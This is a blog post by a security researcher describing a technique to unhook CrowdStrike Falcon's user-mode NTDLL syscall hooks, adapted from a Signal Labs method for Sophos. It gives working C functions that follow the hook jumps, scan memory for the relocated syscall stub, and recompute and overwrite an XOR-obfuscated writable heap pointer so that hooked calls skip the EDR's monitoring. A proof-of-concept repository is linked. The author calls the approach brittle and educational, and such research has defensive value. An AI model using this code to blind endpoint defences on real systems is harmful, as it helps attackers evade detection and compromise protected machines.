I recently encountered a blog post by Signal Labs about using in-memory disassembly to perform EDR unhooking. In the post, the authors outline a technique whereby hook jumps implemented by Sophos are followed in order to find the relocated original syscall stub. This is first done for NtAllocateVirtualMemory
, which the authors unhook by replacing the EDR’s hook with their own hook pointing to the relocated stub. Once they’ve unhooked this function, it can be leveraged for the further unhooking of other functions.
For my own education and curiosity, I was keen to try out this approach with another EDR, Crowdstrike Falcon. I found that the hooking implementation of Falcon posed more challenges than that of Sophos (probably unsurprisingly), but with some hacky alternative approaches, I was able to achieve similar unhooking of NTDLL syscall stubs without VirtualProtect/NtAllocateVirtualMemory
, or loading a fresh copy of ntdll.dll
.
Two notes before I go through the approach:
- This was a fun challenge, but I don’t think the result is really a practical approach - as will likely become apparent when looking at the steps. This is extremely targeted to a specific unhooking implementation, is not robust, and would just break if any part of the hooking implementation changed.
- I’m going to just brush over the initial custom
GetModuleHandle/GetProcAddress
that are used to locate the function we want to unhook. These are pretty widely covered elsewhere - so much so that they trigger ML detections and need little extra work to not be flagged.
Finding the relocated syscall stub.
So the first thing we need to do is find the relocated syscall stub. In the Signal Labs blog, they find that the hooked functions start with a direct jmp
instruction, followed by an indirect jmp
instruction that lands in the EDR’s DLL. Once landed in this DLL, a pointer is loaded into rax
which is then jumped to, leading to the relocated syscall stub.
Unfortunately in the case of Falcon, the stub wasn’t quite so straightforward to find. As an example we’ll have a look at trusty old NtProtectVirtualMemory
.
The hook starts in the expected way. The initial mov r10,rcx
call is still there, but followed by a jmp
where an unhooked function would usually expect the syscall SSN to be moved into eax
.
Following the jump takes us to another address in the .text
section of ntdll.dll
where we find a series of push rcx
instructions, before an indirect jump is made to the Falcon DLL.
When we land in the DLL, there are 3 instructions before making another jump. The first instruction takes a value and stores it in the r10
register, the second moves another value from memory into eax
, and the final instruction XORs the r10
value with a third value in memory.
We jump to an address just a little bit above where we previously were. Here we find a loop, which we’ll come back to later, that modifies the value in r10
. After the loop has finished, a value is loaded from an offset of r10
and jumped to - and at this point, we’ll stop following the jumps.
Unlike the Sophos example, we don’t quickly encounter a jump that leads to the relocated syscall stub here, so what other options do we have?
Well, we know what address the relocated syscall stub is going to jump back to at some point… the address that follows the location of the original hook. We can just search through the relevant sections of allocated memory looking for that address - it’s crude, but works.
Implementation
So to start with, once we’ve got the address of the ntdll.dll
function using some version of GetModuleHandle/GetProcAddress
, we can check whether it is likely to be hooked by the presence of a jmp
following the initial mov r10, rcx
. We don’t know what type of jmp
might be used, so we account for the range of jmp
opcodes.
VOID * FindHook(VOID * pFunc, LPCSTR pFuncName) {
BYTE * firstByte = (BYTE *) pFunc;
// Crude check for mov r10,rcx to determine whether function is syscall stub, or fully implemented in module
if (
*firstByte != 0x4c ||
*(firstByte + 1) != 0x8b ||
*(firstByte + 2) != 0xd1
) {
printf("[!] Unexpected bytes found at function starting at: %p\n", pFunc);
return NULL;
}
BYTE * fourthByteAddr = firstByte + 3;
if (
*fourthByteAddr == 0xeb ||
*fourthByteAddr == 0xe9 ||
*fourthByteAddr == 0xff ||
*fourthByteAddr == 0xea
) {
return fourthByteAddr;
} else {
return NULL;
}
}
We then need to resolve the jmp
to know where it lands, and also grab the address of the instruction after the jmp
, which will be the address that we are searching for in memory. We can combine these into a more generic function that can be reused for later jumps.
VOID * ResolveJmp(BYTE * jmpAddr, VOID ** nextInstructionOut) {
BYTE jmpOp = *jmpAddr;
if (jmpOp == 0xe9) {
BYTE * nextInstruction = jmpAddr + 5;
DWORD offset = *((DWORD *) (jmpAddr + 1));
if (nextInstructionOut != NULL) {
*nextInstructionOut = nextInstruction;
}
return nextInstruction + offset;
}
if (jmpOp == 0xff) {
VOID * nextInstruction = jmpAddr + 6;
VOID * addr = (VOID *) *((DWORDLONG *) nextInstruction);
if (nextInstructionOut != NULL) {
*nextInstructionOut = nextInstruction;
}
return addr;
}
// Other jmp opcodes...
return NULL;
}
Now we know the address that the relocated stub is going to be jumping back to, we can search for it using VirtualQueryEx
, looping over the pages within the virtual address space. We want to narrow things down a bit, so we can limit our search to memory that is MEM_COMMIT
, MEM_PRIVATE
, and PAGE_EXECUTE_READ
(these were confirmed for Falcon just using a debugger).
We have to make sure at least that the section is committed and readable, otherwise we’ll be dereferencing a null pointer and causing an error. The jmp
to the address we are searching for is going to be in the middle of the relocated syscall stub, so we need to walk backwards to locate the initial mov r10, rcx
that should indicate the start. We can return the SSN (it’s not used later but could be useful if we instead opted to direct syscall), and also the base address of the relocated stub. This will be where our patch would want to jmp
to.
WORD FindRelocatedStub(VOID * addrToFind, VOID ** unhookAddr) {
MEMORY_BASIC_INFORMATION info;
for (
BYTE * p = NULL;
VirtualQueryEx(GetCurrentProcess(), p, &info, sizeof(info)) == sizeof(info);
p += info.RegionSize
) {
// Memory sections we want to include. In the example case, the section is COMMITTED/PRIVATE/RX
if (info.State != MEM_COMMIT || info.Type != MEM_PRIVATE || info.Protect != PAGE_EXECUTE_READ) {
continue;
}
for (SIZE_T i = 0; i < (info.RegionSize - sizeof(VOID *)); i++) {
VOID * checkBytes = (VOID *) *((DWORDLONG *) ((BYTE *) info.BaseAddress + i));
if (checkBytes == addrToFind) {
BYTE * finalJmpAddr = (BYTE *) info.BaseAddress + i;
// Only walk back 100 bytes. If it's not found within that, we are probably in the wrong place.
for (int backCounter = 1; backCounter < 100; backCounter++) {
if (
*((BYTE *) finalJmpAddr - backCounter) == 0x4c &&
*((BYTE *) ((finalJmpAddr - backCounter) + 1)) == 0x8b &&
*((BYTE *) ((finalJmpAddr - backCounter) + 2)) == 0xd1
) {
*unhookAddr = (BYTE *) finalJmpAddr - backCounter;
WORD syscallID = *(WORD *)((BYTE *) ((finalJmpAddr - backCounter) + 4));
return syscallID;
}
}
}
}
}
return NULL;
}
Where can we patch?
So hopefully now we know the address of the relocated stub. But what can we actually patch in order to jump there? Back in the Signal Labs post, they simply mention “replacing the hooks from the EDR/AV with our own hook.” In my case though, I found that this wasn’t possible. The initial hooks are located in the .text
section of ntdll.dll
, which isn’t writable without calling VirtualProtect
first. The existing hooks were also E9
near jumps, which wouldn’t put us in range of our relocated stub, and I don’t believe we would be able to patch in a far jump without mangling surrounding instructions.
Well, what about second jmp
the hook goes to? That one is a far jump. Again though, this is still located inside the .text
section of ntdll.dll
and isn’t writable. The third jmp
after this is located inside the Falcon DLL itself, and also isn’t writable, as well as being a short jump. The fourth jump is interesting though - it is also located in the DLL .text
section, so isn’t directly writable, but it’s jumping to a register, r10
, and as we briefly covered early, this register is filled with a value from memory that undergoes some modification before being jumped to.
Let’s cover again what’s happening at this point:
- After following the first
jmp
in the hook, we land amongst somepush rcx
instructions. Through testing, I found that different function hooks land in different places in the series ofpush rcx
instructions, varying the final address they jump to. - We then
jmp
again to a few instructions wherer10
is filled with a value from memory, and then is XOR’d with another value from memory. The resulting value is an address that is generally somewhere in some heap memory of the Falcon DLL. - We
jmp
again and land in a loop, showed in the image above. This loop performs one iteration for everyrcx
value that was pushed to the stack after the firstjmp
. For every iteration of the loop, the value0x45
is added to the address inr10
. - At the end of the loop, we
jmp
tor10 + 0x28
.
The final memory address that is loaded into the jmp
is a section of heap memory, and happens to be writable. We can therefore work out where this address is by programmatically performing the steps listed above, writing our relocated stub address to the address we calculate, and the jmp r10 + 0x28
will naturally jump to the relocated stub, load the SSN into eax
, and jump back to after the hook.
Our function needs to:
- Follow the first
jmp
- Count how many
push rcx
are performed - Follow the second
jmp
- Perform the XOR between the two values to get our initial stack address
- Add
0x45
for however manypush rcx
we counted - Add
0x28
to account for the final addition in the jump - Write the address we found for the relocated stub to here
BOOL PatchHeapAddr(BYTE * landingAddr, VOID * targetAddr) {
DWORD_PTR * patchAddr = NULL;
BYTE * nextLanding = NULL;
BYTE * nextInstruction = NULL;
BYTE * initialHeapAddr = NULL;
VOID * xorAddr1 = NULL;
VOID * xorAddr2 = NULL;
DWORD offset = 0;
int stackValCounter = 0;
// Count how many pushes to the stack are made before the jump
while (*landingAddr == 0x51) {
stackValCounter++;
landingAddr++;
}
nextLanding = ResolveJmp(landingAddr, NULL);
if (nextLanding == NULL) {
return FALSE;
}
// Find the starting value of the heap address, pre-modification by the loop
// To do this we find the value moved into r10. This is the address of the next instruction + an offset
offset = *((DWORD *) (nextLanding + 3));
nextInstruction = nextLanding + 7;
xorAddr1 = (VOID *) *((DWORDLONG *) (nextInstruction + offset));
// We then find the next value, which will be XOR'd with the first. We skip an instruction in the middle which isn't used in resolving the address.
// Then it is also a case of the next instruction + an offset
nextInstruction = nextInstruction + 6;
offset = *((DWORD *) (nextInstruction + 3));
nextInstruction = nextInstruction + 7;
xorAddr2 = (VOID *) *((DWORDLONG *) (nextInstruction + offset));
// XORing the two values gives us the initial address on the heap, before any modifications
initialHeapAddr = ((DWORDLONG) xorAddr1) ^ ((DWORDLONG) xorAddr2);
// We then perform the same actions the loop does, adding 0x45 for each value previously pushed to the stack, and adding 0x28 on the end.
patchAddr = initialHeapAddr + (0x45 * (stackValCounter)) + 0x28;
*patchAddr = targetAddr;
return TRUE;
}
And at this point, we should have successfully unhooked the function without using VirtualProtect
.
As mentioned already, this is obviously incredibly brittle because it’s reversing a specific piece of obfuscation where any of the hardcoded values could easily change. We could dynamically resolve the value added in the loops and the final jump, in case it was changed. Obligatory mention that nowadays of course user-land API hooking is just one part of the picture for modern EDRs, and isn’t going to be sufficient for evasion on its own. Another note is that this has only been tested on a couple of different instances of Falcon but all within the same organisation - it may well be the case that the hardcoded values used to unhook actually differ in different deployments.
Demo and code
Here’s a video demo where the unhooking is performed, and execution is stepped through with a debugger to confirm that the unhook works. Link to PoC repo: https://github.com/inb1ts/birdnet-poc